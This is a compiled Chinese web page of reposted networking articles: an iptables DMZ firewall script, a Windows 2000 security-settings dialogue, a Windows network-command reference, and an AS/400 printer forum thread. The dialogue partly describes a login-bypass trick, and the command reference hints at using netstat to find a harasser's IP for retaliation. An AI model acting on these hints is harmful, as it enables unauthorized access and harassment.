当前位置：首页 > 实用文档 > 其他范文> 网络最高安全指南Windows系统

网络最高安全指南Windows系统

时间：2023-03-07 07:47:57 其他范文收藏本文下载本文

网络最高安全指南Windows系统（共10篇）由网友“meihua2008tjp”投稿提供，下面是小编帮大家整理后的网络最高安全指南Windows系统，希望对大家带来帮助，欢迎大家分享。

网络最高安全指南Windows系统

篇1：网络最高安全指南Windows系统

一般被保护的内部网络可分成两部分，一部分是内部通讯区，只允许内部用户访问，绝对禁止外部用户访问，另一部分是停火区DMZ，对外提供有条件的服务，前者是系统的核心子网，后者易受到外部的攻击，是一个比较危险的子网环境。一方面要求严格保护内部子网，

一般被保护的内部网络可分成两部分，一部分是内部通讯区，只允许内部用户访问，绝对禁止外部用户访问，另一部分是停火区DMZ，对外提供有条件的服务。前者是系统的核心子网，后者易受到外部的攻击，是一个比较危险的子网环境。一方面要求严格保护内部子网，另一方面又要满足DMZ对外提供服务的需要，因此，必须采用分别保护的策略，对上述两个区域进行保护。两个区域要尽量独立，即使DMZ受到外部攻击，内部子网仍处于防火墙的保护之下。

本文介绍利用Linux的iptables工具来建立一个具有DMZ的防火墙。

一、软硬件要求

充当防火墙的机器是一台支持iptables的Linux系统，装有三个网卡。

二、具体配置

步骤1：配置内核

netfilter要求Linux内核版本不低于2.3.5，在编译新内核时，要求选择和netfilter相关的项目，这些项目通常都是位于“Networking options”子项下。

步骤2：环境构造

这里给出一个用于测试的例子，实际应用可根据具体的情况进行设置。

对外提供服务的内部主机构成一个停火区（假设分配的网段为192.168.1.0/24），防火墙的两个网卡eth1、eth2分别通过hub1、hub2与停火区、内部通讯区相连，另一个网卡eth0通过直连线（或hub）与路由器的网卡eth1相连，路由器的另一网卡eth0通过一个hub与外部通讯区相连。如图所示。

路由器增加以下设置：

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.9.200.2

arp -i eth1 -Ds 192.168.1.1 eth1 pub

防火墙的设置为：

route add default gw 192.168.1.1

route add -host 192.168.1.1 gw 192.168.1.2

route add -net 192.169.1.0 netmask 255.255.255.0 gw 192.168.1.3 eth1

停火区主机的网关设为防火墙的网卡eth1地址192.168.1.3。

外部主机的网关设为路由器的外网卡eth0地址10.0.0.1。

内部主机的网关设为路由器的内网卡eth2地址168.1.1.1。

步骤3：建立规则

在防火墙上创建如下脚本并运行之。

#!/bin/sh

######## default firewall rules-deny all ########

iptables -P INPUT DROP

iptables -P OUTPUT DROP

iptables -P FORWARD DROP

###############################################

# Rules between EXTERNAL LAN and INTERNAL LAN #

###############################################

######## masquerade INTERNAL Address to xx.xx.xx.xx when going out ########

iptables -t nat -A POSTROUTING -s 168.1.1.0/24 -d 10.0.0.0/24 -o eth0 -j SNAT --to xx.xx.xx.xx

######## deny all from EXTERNAL LAN to INTERNAL LAN directly ########

iptables -t nat -A PREROUTING -s 10.0.0.0/24 -d 168.1.1.0/24 -i eth0 -j DROP

######################################

# Rules between DMZ and INTERNAL LAN #

######################################

######## allow INTERNAL LAN to DMZ ########

iptables -A FORWARD -p icmp -s 168.1.1.0/24 -d 192.168.1.0/24 -m limit --limit 1/s --limit-burst 10 -j ACCEPT

iptables -A FORWARD -s 168.1.1.0/24 -d 192.168.1.0/24 -i eth2 -j ACCEPT

######## forbid DMZ to INTERNAL LAN except following instance ########

iptables -A FORWARD -p tcp -s 192.168.1.0/24 -d 168.1.1.0/24 ! --syn -i eth1 -j ACCEPT

iptables -A FORWARD -p tcp -s 192.168.1.0/24 --sport 20 -d 168.1.1.0/24 -i eth1 -j ACCEPT

iptables -A FORWARD -p icmp --icmp-type 0 -s 192.168.1.0/24 -d 168.1.1.0/24 -m limit --limit 1/s --limit-burst 10 -j ACCEPT

iptables -A FORWARD -p udp -s 192.168.1.0/24 -d 168.1.1.0/24 --sport 53 -j ACCEPT

######################################

# Rules between EXTERNAL LAN and DMZ #

######################################

### allow EXTERNAL LAN to DMZ but deny all from EXTERNAL LAN to DMZ directly ###

iptables -t nat -A PREROUTING -s 10.0.0.0/24 -d 192.168.1.0/24 -i eth0 -j DROP

### REAL_XX is real address of XX server in DMZ ###

### MASQ_XX is the masquaded address of REAL_XX supplied to EXTERNAL LAN ###

######## allow DNS service ########

iptables -t nat -A PREROUTING -p udp -d MASQ_DNS -s 10.0.0.0/24 --dport 53 -i eth0 -j DNAT --to REAL_DNS

iptables -A FORWARD -p udp -s 10.0.0.0/24 -d REAL_DNS -i eth0 --dport 53 -j ACCEPT

iptables -A FORWARD -p udp -d 10.0.0.0/24 -s REAL_DNS -i eth1--sport 53 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp -d MASQ_DNS -s 10.0.0.0/24 --dport 53 -i eth0 -j DNAT --to REAL_DNS

iptables -A FORWARD -p tcp -s 10.0.0.0/24 -d REAL_DNS -i eth0 --dport 53 -j ACCEPT

iptables -A FORWARD -p tcp -d 10.0.0.0/24 -s REAL_DNS -i eth1 --sport 53 ! --syn -j ACCEPT

######## allow HTTP service ########

iptables -t nat -A PREROUTING -p tcp --dport 80 -d MASQ_HTTP -s 10.0.0.0/24 -i eth0 -j DNAT --to REAL_HTTP

iptables -A FORWARD -p tcp -s 10.0.0.0/24 -d REAL_HTTP -i eth0 --dport 80 -j ACCEPT

iptables -A FORWARD -p tcp -d 10.0.0.0/24 -s REAL_HTTP -i eth1 --sport 80 ! --syn -j ACCEPT

######## allow FTP service ########

iptables -t nat -A PREROUTING -p tcp --dport 21 -d MASQ_FTP -s 10.0.0.0/24 -i eth0 -j DNAT --to REAL_FTP

iptables -A FORWARD -p tcp -s 10.0.0.0/24 -d REAL_FTP -i eth0 --dport 21 -j ACCEPT

iptables -A FORWARD -p tcp -s REAL_FTP -d 10.0.0.0/24 -i eth1--sport 20 -j ACCEPT

iptables -A FORWARD -p tcp -d 10.0.0.0/24 -s REAL_FTP -i eth1--sport 21 ! --syn -j ACCEPT

．．．．．．

### You can add other services in DMZ here such as TELNET、SMTP、POP3 & IMAP etc. ###

．．．．．．

######## deny DMZ to EXTERNAL LAN except to external smtp server ########

iptables -t nat -A POSTROUTING -p tcp --dport 25 -d 10.0.0.0/24 -s REAL_SMTP -o eth0 -j SNAT --to MASQ_SMTP

iptables -A FORWARD -p tcp -s REAL_SMTP -d 10.0.0.0/24 -i eth1 --dport 25 -j ACCEPT

iptables -A FORWARD -p tcp -d REAL_SMTP -s 10.0.0.0/24 -i eth0--sport 25 ! --syn -j ACCEPT

通过以上步骤，具有DMZ的防火墙达到了以下目标：

1．内部通讯区可以无限制的访问外部通讯区以及DMZ，但访问外部通信区时防火墙进行了源地址转换，

2．外部通讯区可以通过对外公开的地址访问DMZ的服务器，由防火墙完成对外地址到服务器实际地址的转换。

3．外部通讯区不能访问内部通讯区以及防火墙。

4．DMZ不可以访问内部通讯区。

5．除外部通讯区邮件服务器外，DMZ不能访问外部通讯区。

原文转自：www.ltesting.net

篇2：Windows 安全问答Windows系统

一天，盆盆不小心把Windows 2000的登录密码给误改了，现在硬是“鬼子不能进村”，遂急呼汤汤来帮忙，旁门左道不通盆盆：汤汤，快救救我吧，我的电脑现在六亲不认，自家人不能进自家门。我该怎么办，不会要重装吧？汤汤：钥匙丢了，正门自然不让进，但我们

一天，盆盆不小心把Windows 2000的登录密码给误改了，现在硬是“鬼子不能进村”，遂急呼汤汤来帮忙。

旁门左道不通

盆盆：汤汤，快救救我吧，我的电脑现在六亲不认，自家人不能进自家门。我该怎么办，不会要重装吧？

汤汤：钥匙丢了，正门自然不让进，但我们可以试试 ――“输入法漏洞”，当系统启动到登录界面时，按“Ctrl+Shift”调出任一输入法，并激活其帮助文档，右击“选项”按钮，点击“跳到url”……（为了安全原因，此处省去百余字）。运气不错，果然进入了。

盆盆：太感谢你了，不过还有一个地方也让我“郁闷”，万一哪天别人也从这个“密道”里潜入我的系统，那我怎么办？

汤汤：说得对，Windows 2000有那么大一个窟窿，一旦有不怀好意的人进来，那你的机器就算是铜墙铁壁，也会“四十万人齐卸甲”。赶紧到www.microsoft.com/china上去下载最新的“Service Pack”，把这个窟窿眼堵上吧（如图1）。

图1 下载最新的“Service Pack”

治标更要治本

汤汤：尽管外界对微软的产品有颇多微词，贬低微软甚至还成了业界的一种时尚。但是平心而论，Windows 2000的安全性能还是很不错的，尤其是和它的前辈Windows 98相比，可以说是上了一个台阶。今天我就给你讲讲如何对Windows 2000进行安全配置吧。

首先，对你的管理员账号（Administrator）进行“易容术”（重命名），这样就可以防止一些穷举密码工具的骚扰。比如把你的管理员账号改名为“你的仆人”，这样就算有无聊的人想搞破坏，也万难“篡位”成功。

盆盆：这个方法很不错，但是怎么改呢？

汤汤：右击“我的电脑→管理”，展开“计算机管理”窗口里的“本地用户和组”，点击“用户”，在右面的详细窗格里右击你的管理员账号，选“重命名”即可。盆盆：我的电脑有好几个人在用，我给他们分别创建了User组账号，现在有一个朋友说他不能关机了，这是怎么回事啊？

汤汤：那么多的用户就他一个无法关机，显然不是软硬件配置问题。这里要隆重推荐一位明星――“用户权力指派”，此公专司用户权限的分配与仲裁，相当于球场上的裁判，如果存在分配不公，那多半是这位裁判吹了“黑哨”。要请动这位裁判并不难，只需进入“管理工具→本地安全策略→本地策略”，然后展开窗口里的“用户权力指派”即可（如图2）。

图2 为用户指派不同权力

现在我们来看看它是如何来裁断这个用户的：你只需在图2所示的右边详细窗格里找到“关闭系统”，在右键菜单里选“安全性”，然后把这个用户添加进去即可，

盆盆：没想到这个裁判权力这么大，那它还有什么别的功能吗？

汤汤：那当然了，下面举几个简单例子。一些操作权限（特别是处理不当会危及整个系统的），通常只赋予管理员组的用户，例如管理“审核和安全日志”、“远程关机”、“安装驱动程序”等。当然你也可以把这些权力下放给信得过的用户。

比如说安装驱动程序，如果每次都要劳动你的大驾，也是有点无趣，不妨委派给你的亲信去操作，大可不必大权独揽、事必躬亲。还有，你的机器是一个单机环境，没必要从网络访问，你应该把“拒绝从网络访问此计算机”的权限赋给Everyone组的成员，这样还可以对入侵说不，套用一句现成的广告词：算是治到根本上了。

君子请勿动手

盆盆：我突发奇想，想让每个用户登录系统的时候，屏幕上都显示一句话：“本系统属于盆盆，任何人都不要试图进行破坏”，好让他人知道，“君子动口不动手”，不知道可不可以，是不是要改注册表啊？

汤汤：这种小Case当然用不着劳动注册表的大驾，这时候我们要有请另一个“腕儿”――“安全选项”。说来也巧，它正好和“用户权力指派”同处一个办公室（都位于“本地安全策略”控制台下）。在图2所示的窗口单击“安全选项”，然后在右边详细窗格找到“用户视图登录时消息文字”，双击即出现图3所示的界面。在文本框里输入你想要的警示语，完成之后重新登录看看，你就没事偷着乐吧！

盆盆：看来“本地安全策略”下的组件个个都是高手。

汤汤：是的，“安全选项”的功能也有很多，举三个最实用的例子吧。

第一，前面说到为了防止恶意穷举登录密码，特地把管理员账号改名，但是光这样还不行，因为系统默认显示上一次的登录名，其实要禁止它很容易，双击“登录屏幕上不要显示上次登录的用户名”，启用即可。

图3 “请不要搞破坏”

其二，为了防止有些木马程序伪装成登录窗口，来骗取你的用户名及密码，你可以强制用户必须按“Ctrl+Alt+Del”调出登录窗口，方法是双击“禁用按Ctrl+Alt+Del进行登录的设置”然后禁用它。

第三是启用“在关机时清理虚拟内存页面交换文件”，这样的好处是防止未经授权的用户访问页面文件里的数据，本来要完成这个功能需要第三方软件的赞助，现在用“安全选项”也能“友情客串”这个功能。

利用本地安全策略还可以对审核事件进行设置。记住，完善的安全日志能够帮助你更好地分析问题。但是Windows 2000缺省不记录任何审核事件，我们可以根据需要加上必要安全日志，具体方法是切换到“本地策略→审核策略”，比如我们要对登录事件进行审核，只需双击“审核对象访问”，然后在“成功”和“失败”复选框上都打勾即可。这样我们可以很方便地追查系统登录的情况，最大限度地防止入侵。

原文转自：www.ltesting.net

篇3：网络命令一览表Windows系统

Ping ??Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报，根据返回的信息，你就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/

Ping

??Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的，你必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。

??简单的说，Ping就是一个测试程序，如果Ping运行正确，你大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，前段时间Yahoo就是被利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

??按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答。

??Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，你可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

通过Ping检测网络故障的典型次序

??正常情况下，当你使用Ping命令来查找问题所在或检验网络运行情况时，你需要使用许多Ping命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：

ping 127.0.0.1――这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

ping 本机IP――这个命令被送到你计算机所配置的IP地址，你的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

ping 局域网内其他IP――这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

ping 网关IP――这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

ping 远程IP――如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

ping localhost――localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

ping www.yahoo.com――对这个域名执行Ping命令，你的计算机必须先将域名转换成IP地址，通常是通过DNS服务器如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：你也可以利用该命令实现域名对IP地址的转换功能。

??如果上面所列出的所有Ping命令都能正常运行，那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

Ping命令的常用参数选项

ping IP -t――连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。

ping IP -l ――指定Ping命令中的数据长度为2000字节，而不是缺省的32字节。

ping IP -n――执行特定次数的Ping命令。

Netstat

??Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。

如果你的计算机有时候接受到的数据报会导致出错数据删除或故障，你不必感到奇怪，TCP/IP可以容许这些类型的错误，并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比，或者它的数目正迅速增加，那么你就应该使用Netstat查一查为什么会出现这些情况了。

Netstat的一些常用选项：

netstat -s――本选项能够按照各个协议分别显示其统计数据。如果你的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么你就可以用本选项来查看一下所显示的信息。你需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在。

netstat -e――本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量）。

netstat -r――本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的信息。除了显示有效路由外，还显示当前有效的连接。

netstat -a――本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。

netstat -n――显示所有已建立的有效连接。

Netstat的妙用

??经常上网的人一般都使用ICQ的，不知道你有没有被一些讨厌的人骚扰得不敢上线，想投诉却又不知从和下手？其实，你只要知道对方的IP，就可以向他所属的ISP投诉了。但怎样才能通过ICQ知道对方的IP呢？如果对方在设置ICQ时选择了不显示IP地址，那你是无法在信息栏中看到的。其实，你只需要通过Netstat就可以很方便的做到这一点：当他通过ICQ或其他的工具与你相连时（例如你给他发一条ICQ信息或他给你发一条信息），你立刻在DOS Prompt下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了。甚至连所用Port都完全暴露了，如果你想给他一些教训，这些信息已经足够……

IPConfig

??IPConfig实用程序和它的等价图形用户界面――Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议（Dynamic Host Configuration Protocol，DHCP――Windows NT下的一种把较少的IP地址分配给较多主机使用的协议，类似于拨号上网的动态IP分配），这个程序所显示的信息也许更加实用。这时，IPConfig可以让你了解你的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。

最常用的选项：

ipconfig――当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值

ipconfig /all――当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期（有关DHCP服务器的相关内容请详见其他有关NT服务器的书籍或询问你的网管），其输出信息见图6的下半部分。

ipconfig /release和ipconfig /renew――这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果你输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果你输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址，

请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。

??如果你使用的是Windows 95/98，那么你应该更习惯使用winipcfg而不是ipconfig，因为它是一个图形用户界面，而且所显示的信息与ipconfig相同，并且也提供发布和更新动态IP地址的选项如果你购买了Windows NT Resource Kit（NT资源包），那么Windows NT也包含了一个图形替代界面，该实用程序的名字是wntipcfg，和Windows 95/98的winipcfg类似。

ARP（地址转换协议）

??ARP是一个重要的TCP/IP协议，并且用于确定对应IP地址的网卡物理地址。实用arp命令，你能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外，使用arp命令，也可以用人工方式输入静态的网卡物理/IP地址对，你可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作，有助于减少网络上的信息量。

??按照缺省设置，ARP高速缓存中的项目是动态的，每当发送一个指定地点的数据报且高速缓存中不存在当前项目时，ARP便会自动添加该项目。一旦高速缓存的项目被输入，它们就已经开始走向失效状态。例如，在Windows NT网络中，如果输入项目后不进一步使用，物理/IP地址对就会在2至10分钟内失效。因此，如果ARP高速缓存中项目很少或根本没有时，请不要奇怪，通过另一台计算机或路由器的ping命令即可添加。所以，需要通过arp命令查看高速缓存中的内容时，请最好先ping 此台计算机（不能是本机发送ping命令）。

常用命令选项：

arp -a或arp -g――用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。

arp -a IP――如果你有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。

arp -s IP 物理地址――你可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。

arp -d IP――使用本命令能够人工删除一个静态项目。

??看到这里，你也许已经有些累了……其实对于一般用户来说也已经足够――你可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与你所建立的连接并找出ICQ使用者所隐藏的IP信息、可以用arp查看网卡的MAC地址――这些已足已让你丢掉菜鸟的头衔。如果你并不满足，那就“硬着头皮”（下面的内容可能有些枯燥）继续Follow me……

Tracert

??当数据报从你的计算机经过多个网关传送到目的地时，Tracert命令可以用来跟踪数据报使用的路由（路径）。该实用程序跟踪的路径是源计算机到目的地的一条路径，不能保证或认为数据报总遵循这个路径。如果你的配置使用DNS，那么你常常会从所产生的应答中得到城市、地址和常见通信公司的名字。Tracert是一个运行得比较慢的命令（如果你指定的目标地址比较远），每个路由器你大约需要给它15秒钟

??Tracert的使用很简单，只需要在tracert后面跟一个IP地址或URL，Tracert会进行相应的域名转换的。Tracert一般用来检测故障的位置，你可以用tracert IP在哪个环节上出了问题，虽然还是没有确定是什么问题，但它已经告诉了我们问题所在的地方，你也就可以很有把握的告诉别人――某某出了问题。

Route

??大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器，因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题，该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。

??但是，当网络上拥有两个或多个路由器时，你就不一定想只依赖缺省网关了。实际上你可能想让你的某些远程IP地址通过某个特定的路由器来传递，而其他的远程IP则通过另一个路由器来传递。

??在这种情况下，你需要相应的路由信息，这些信息储存在路由表中，每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下，必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。

一般使用选项：

route print――本命令用于显示路由表中的当前项目，在单路由器网段上的输出结果如图12，由于用IP地址配置了网卡，因此所有的这些项目都是自动添加的。

route add――使用本命令，可以将信路由项目添加给路由表。例如，如果要设定一个到目的网络209.98.32.33的路由，其间要经过5个路由器网段，首先要经过本地网络上的一个路由器，器IP为202.96.123.5，子网掩码为255.255.255.224，那么你应该输入以下命令：

route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5

route change――你可以使用本命令来修改数据的传输路由，不过，你不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器，它采用一条包含3个网段的更直的路径：

route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3

route delete――使用本命令可以从路由表中删除路由。例如：route delete 209.98.32.33

NBTStat

??NBTStat（TCP/IP上的NetBIOS统计数据）实用程序用于提供关于关于NetBIOS的统计数据。运用NetBIOS，你可以查看本地计算机或远程计算机上的NetBIOS名字表格。

常用选项：

nbtstat -n――显示寄存在本地的名字和服务程序

nbtstat -c――本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于寸放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。

nbtstat -r――本命令用于清除和重新加载NetBIOS名字高速缓存。

nbtstat -a IP――通过IP显示另一台计算机的物理地址和名字列表，你所显示的内容就像对方计算机自己运行nbtstat -n一样

nbtstat -s IP――显示实用其IP地址的另一台计算机的NetBIOS连接表。

Net

??Net命令有很多函数用于实用和核查计算机之间的NetBIOS连接。这里我只介绍最常用的两个：net view和net use。

net view UNC――运用此命令，你可以查看目标服务器上的共享点名字。任何局域网里的人都可以发出此命令，而且不需要提供用户ID或口令。UNC名字总是以\\开头，后面跟随目标计算机的名字。例如，net view \\lx就是查看主机名为lx的计算机的共享点（见图15）。

net use 本地盘符目标计算机共享点――本命令用于建立或取消到达特定共享点的映像驱动器的连接（如果需要，你必须提供用户ID或口令）。例如，你输入net use f: \\lx\mp3就是将映像驱动器F:连接到\\lx\mp3共享点上，今后你直接访问F:就可以访问\\lx\mp3共享点，这和你右击“我的电脑”选择映射网络驱动器类似。

htldm 回复于：-02-12 14:47:48hbczjzc 收藏了好多精华呀！

午夜聆听回复于：2003-02-12 20:08:29谢谢楼主大哥。。。。。好帖子

wienne 回复于：2003-02-13 10:16:28

quicksand 回复于：2003-02-13 16:22:45好，收藏！

kinks 回复于：2003-04-12 02:13:11收藏，谢谢

云中飘回复于：2003-04-12 12:49:54good~~~~~

nice.boy 回复于：2003-06-22 02:02:57好精典

原文转自：www.ltesting.net

篇4：400网络打印机Windows系统

我们公司现在买了台网络打印机,想连接到400主机. 现在主机表已经建好了,打印机的IP地址也已经设定好. 不知该用什么命令连接,哪位大哥帮帮忙,小弟在此谢过. qingzhou 回复于：-01-07 19:29:54 确保OS/400系统值QAUTOCFG=1，然后通过CA/400或者PCOM仿真软

我们公司现在买了台网络打印机,想连接到400主机.

现在主机表已经建好了,打印机的IP地址也已经设定好.

不知该用什么命令连接,哪位大哥帮帮忙,小弟在此谢过.

qingzhou 回复于：2005-01-07 19:29:54确保OS/400系统值QAUTOCFG=1，然后通过CA/400或者PCOM仿真软件配置Print Session，然后将Session驱动指向网络打印机的驱动程序，并启动Print Session即可，

lusimon 回复于：2005-01-07 20:33:15网络打印机可以通过直接设置Remote Output Queue来连接。具体方法可以参考：www-912.ibm.com/s_dir/slkbase.nsf/1ac66549a21402188625680b0002037e/9f4b1d4d23c582f1862565cd4471?OpenDocument&Highlight=0,8983237

qingzhou 回复于：2005-01-07 21:15:30[quote:a4bf3649b0=“lusimon”]网络打印机可以通过直接设置Remote Output Queue来连接。具体方法可以参考..........[/quote:a4bf3649b0]

网络打印设定其实很简单的，不要搞那么复杂。

配置好打印SESSION后，直接通过WRKOUTQ对SPLF处理即可输出。

fh 回复于：2005-01-08 02:14:51qingzhou和lusimon 讲的是网络打印机的两种方式，都可以。但qingzhou的方式用得更普遍，而lusimon的方式用得很少，需要网络打印机有支持LPR功能。我曾试过lusimon的方式打印，但似乎页面显示效果不佳。不知是不是我哪里没设对。 :cry: 。但qingzhou的方式用得更多，还有一种同类的软件解决方案，就是CGS的PRINT SERVER, 用过的人似乎觉得比CA打印仿真还好使。

若喜欢硬件解决方案，AXIS的打印服务器也不错。但它是用并口连打印机的，你的网络打印机不知有没有并口。

xuguopeng 回复于：2005-01-09 21:32:09我们用的就是CGS的效果还不错 CGS我也没感觉出太大的优点可能对中文打印支持的更好吧再就是CGS不象CA需要LICPGM

qingzhou 回复于：2005-01-10 22:39:32今天为了恢复IBM 4230针式打印机采用CGS软件配置打印纳品书（不规则的纸型，13×8.5 inch）都折腾了整整一天，靠~~~~，差点晕过去了，

。。 :em06: :em06: :em06: 到19:00才搞定。

最讨厌测试打印不规则纸型，尤其是通过CA/400、PCOM、CGS等采用LAN方式挂接的针式打印机，不仅要考虑选择什么驱动程序（本身不带驱动）、PDT文件，还要自定义宽、高，CGS里面有时还需要选择烦琐的选项，多选一个不行、少选又不行，基于400的打印真是折腾人！

还是TWINAX挂接类似IBM 5400-006打印机来得简单、舒服。

只做400 回复于：2005-01-20 12:41:39问题:C/A仿真网络打印机后含中文的SPLF打印不正确

Environment: AS/400 V5R2M0, LAN, HP LaserJet printer with IP interface, PC installed Client Aclearcase/“ target=”_blank“ >ccess

通过Client Access Printer Emulation方式建立了打印机描述：

1，select ”Transform print data to ASCII on AS/400“

The print device type is automatically configured as 3812，参数 TRANSFORM *YES，没有参数 DBCS Feature。

包含中文文字的 SPLF 打印出来时，中文文字变成乱码，但报表格式正确（132列），英文文字显示正常

2，NOT select ”Transform print data to ASCII on AS/400“

The print device type is automatically configured as 5553，没有参数 TRANSFORM，DBCS Feature 是2424C0（手工修改为 2424S0）

包含中文文字的 SPLF 打印出来时，中文文字正常印出，但 132 列的报表格式不正确（113列后的被换行了，C/A的打印机仿真里已经将纸张选择为横向）

:roll: :roll:

WGMING 回复于：2005-07-05 14:14:40我也遇到同样的问题了，怎么试都不行啊！

不知道你是否已经解决了？

如果解决，忘告知方法。

原文转自：www.ltesting.net

篇5：常用网络命令使用方法Windows系统

当你打开浏览器，自由地游弋于浩如烟海的互联网世界之时，是否也沉迷于下载各种实用软件？其中也许有很大一部分就是网络工具吧！但请你不要忽视你的面前―― Windows （包括Win98和NT）作系统中本来就带有不少的网络实用工具，虽然比较简单，却并不简陋，

当你打开浏览器，自由地游弋于浩如烟海的互联网世界之时，是否也沉迷于下载各种实用软件？其中也许有很大一部分就是网络工具吧！但请你不要忽视你的面前――Windows（包括Win98和NT）作系统中本来就带有不少的网络实用工具，虽然比较简单，却并不简陋。本着“简单就是美”的原则，下面就为你展现Windows网络实用工具的丰采……

Ping

??按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答。

通过Ping检测网络故障的典型次序

ping 127.0.0.1--这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

ping 本机IP--这个命令被送到你计算机所配置的IP地址，你的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

